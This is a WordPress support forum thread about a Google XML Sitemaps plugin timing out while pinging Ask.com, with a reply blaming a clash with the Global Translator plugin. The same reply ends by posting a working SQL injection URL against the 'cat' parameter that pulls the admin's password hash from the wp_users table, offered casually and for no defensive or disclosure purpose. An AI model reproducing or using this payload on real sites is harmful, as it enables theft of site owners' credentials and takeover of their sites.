• I’ve seen some similar posts but nothing exactly the same, and no actual resolution. I’m getting this error:

    Notice: WP HTTP API Web Request failed: Operation timed out after 10000 milliseconds with 0 bytes received in /home/***stars*for*security***/wp-content/plugins/google-sitemap-generator/sitemap-core.php on line 2304
    
    Notice: Failed to ping Ask.com: in /home/***stars*for*security***/wp-content/plugins/google-sitemap-generator/sitemap-core.php on line 2221

    The sitemap is not being generated properly. Unticking the ‘notify ask.com’ option and re-running the build still shows the “The last run didn’t finish! Maybe you can raise the memory or time limit for PHP scripts.” message on the options page, but no errors or warnings in the debug output.

    I’ve tried deactivating various other plugins, nothing has helped. Please advise…

    Thanks,

    Lon

Viewing 2 replies - 1 through 2 (of 2 total)
  • Please I need this tips too…

    I SOLVEd THE PROBLEM AFTER 2 DAYS SEARCHING! My problem was a wrong sitemap integration from Global Translater Plugin and XML-Sitemap Plugin:

    If this aint your problem try increasing your memory or learn .htacces
    If it is look, down here now.

    GO TO YOURSITE.COM/wp-admin/options-general.php?page=global-translator/options-translator.php

    Now scroll a bit down and uncheck this: Enable sitemap integration

    Also some1 at my school found this sql injection attack wich is availbe when both plugins are activated. here it is

    /wp/index.php?cat=%2527+UNION+SELECT+CONCAT(666,CHAR(58),user_pass,CHAR(58),
    666,CHAR(58))+FROM+wp_users+where+id=1/*
Viewing 2 replies - 1 through 2 (of 2 total)
  • The topic ‘[Plugin: Google XML Sitemaps] WP HTTP API Web Request failed: Operation timed out’ is closed to new replies.